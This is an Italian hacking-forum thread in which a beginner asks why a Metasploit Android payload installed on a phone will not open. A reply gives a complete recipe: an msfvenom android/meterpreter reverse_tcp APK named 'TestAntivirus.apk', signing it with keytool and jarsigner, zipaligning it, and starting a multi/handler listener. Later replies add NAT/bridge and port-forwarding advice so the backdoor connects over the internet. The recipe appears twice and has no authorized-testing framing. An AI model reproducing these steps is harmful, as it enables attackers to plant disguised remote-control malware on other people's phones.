Discussione Metasploit Main activity non funziona

Ordina per data Ordina commenti per reazioni
S

SangueAzzurro01

Utente Iron
21 Dicembre 2021
6
2
1
13
buonasera, qualcuno che puo aiutarmi?
ho una macchina virtuale kali linux su windows
ho iniziato a usare metasploit
faccio tutti i passaggi perfettamente
creo il payload e lo scarico sul telefono
l'app non si apre, è installata con tutto abilitato

come posso fare?
 
Inanzitutto,verifica se la tua macchina e in NAT o in Bridge. Se sei sotto NAT devi passare in modalità Bridge.

Per creare il payload fai così:

msfvenom -p android/meterpreter/reverse_tcp LHOST=[INDIRIZZO IP PUBBLICO] LPORT=[LA PORTA CHE HAI FORWARDATO] R> TestAntivirus.apk

Dopo aver creato il file APK bisogna firmare un certificato,perché i dispositivi android non permettono l’installazione di app senza il certificato appropriato,poiché vengono installati solo file .apk firmati.

Per firmare il file .apk usa questo comando:

keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

Dopo procedi così:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore TestAntivirus.apk hacked

Poi firma l’apk con JARsigner:

jarsigner -verify -verbose -certs TestAntivirus.apk

Dopo di che installa Zipalign:

apt-get install zipalign
zipalign -V 4 TestAntivirus.apk signed_jar.apk

Adesso hai firmato il tuo file .apk,Però lo troverai con il nome di singed_jar.apk.

Fatto ciò sei pronto a procedere con Metasploit:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
show options
set LHOST [IP DELLA MACCHINA ATTACCANTE]
set LPORT [PORTA FORWARDATA]
exploit -j

Spero di esserti stato di aiuto ;)
 
  • Mi piace
  • Geniale
Reazioni: SangueAzzurro01, insidehackers e 0xbro
CRYP70 ha detto:
Inanzitutto,verifica se la tua macchina e in NAT o in Bridge. Se sei sotto NAT devi passare in modalità Bridge.

Per creare il payload fai così:

msfvenom -p android/meterpreter/reverse_tcp LHOST=[INDIRIZZO IP PUBBLICO] LPORT=[LA PORTA CHE HAI FORWARDATO] R> TestAntivirus.apk

Dopo aver creato il file APK bisogna firmare un certificato,perché i dispositivi android non permettono l’installazione di app senza il certificato appropriato,poiché vengono installati solo file .apk firmati.

Per firmare il file .apk usa questo comando:

keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

Dopo procedi così:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore TestAntivirus.apk hacked

Poi firma l’apk con JARsigner:

jarsigner -verify -verbose -certs TestAntivirus.apk

Dopo di che installa Zipalign:

apt-get install zipalign
zipalign -V 4 TestAntivirus.apk signed_jar.apk

Adesso hai firmato il tuo file .apk,Però lo troverai con il nome di singed_jar.apk.

Fatto ciò sei pronto a procedere con Metasploit:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
show options
set LHOST [IP DELLA MACCHINA ATTACCANTE]
set LPORT [PORTA FORWARDATA]
exploit -j

Spero di esserti stato di aiuto ;)
Clicca per espandere...
scusa la mia ignoranza, NAT o bridge.. come faccio a saperlo? e se sono in NAT come posso passare a bridge?
 
crisstftyfyfy ha detto:
scusa la mia ignoranza, NAT o bridge.. come faccio a saperlo? e se sono in NAT come posso passare a bridge?
Clicca per espandere...
Devi controllare le impostazioni della VM e verificare se la tua scheda di rete è impostata in NAT o in Bridge.Ti do un consiglio non prenderla come un rimprovero, prima di cazzegiare con le backdoor studia un po’ di teoria e non buttarti subito all’ “attacco”… Qui nel forum trovi un sacco di materiale per iniziare. Come disse Lincoln se avessi a disposizione otto ore per abbattere un albero, ne passerei sei ad affilare l'ascia. Chiudo.

-CRYP70
 
  • Grazie
Reazioni: SangueAzzurro01
CRYP70 ha detto:
Devi controllare le impostazioni della VM e verificare se la tua scheda di rete è impostata in NAT o in Bridge.Ti do un consiglio non prenderla come un rimprovero, prima di cazzegiare con le backdoor studia un po’ di teoria e non buttarti subito all’ “attacco”… Qui nel forum trovi un sacco di materiale per iniziare. Come disse Lincoln se avessi a disposizione otto ore per abbattere un albero, ne passerei sei ad affilare l'ascia. Chiudo.

-CRYP70
Clicca per espandere...
Ho capito, grazie del consiglio. Una cosa che non riesco a capire è se c'è un metodo senza essere connessi alla stessa wifi.
sei stato molto utile comunque.
 
crisstftyfyfy ha detto:
Ho capito, grazie del consiglio. Una cosa che non riesco a capire è se c'è un metodo senza essere connessi alla stessa wifi.
sei stato molto utile comunque.
Clicca per espandere...
Per stabilire una connessione in WAN tramite una determinata porta hai bisogno di eseguire un processo chiamato Port Forwarding,con il termine Port Forwarding si intende l'operazione di abilitare una connessione, solitamente in ingresso e in uscita, quindi una trasmissione di dati, tra due o più dispositivi, indipendentemente che si tratti di server o client.
 

DISCUSSIONI SIMILI

0
Discussione Ufficiale I migliori siti dove praticare Ethical Hacking nel 2024
  • Release
  • In evidenza
  • 10
  • 6K
10
6K
Pentesting e Ethical Hacking
MRPants
N
Discussione Come spacciare un C2 per una connessione normalissima, bypassando il firewall (social engineering - get pwned blue team)
  • Chiuso
  • 0
  • 296
0
296
Sicurezza Informatica
Netcat
H
Discussione La mia esperienza con la EJPT-V2, opinioni e consigli per chi vuole iniziare
  • 15
  • 2K
15
2K
Pentesting e Ethical Hacking
Hackth3w0rld
N
Guida App in Python che automatizza il download di dati geospaziali da Natural Earth (Windows)
  • 4
  • 444
4
444
Python
Netcat
I
Domanda Errore di collegamento con il server. Hamachi File 2011.
  • Chiuso
  • 3
  • 392
3
392
Metin2 Development Domande e Problemi
isPsycho
Top Bottom
Indietro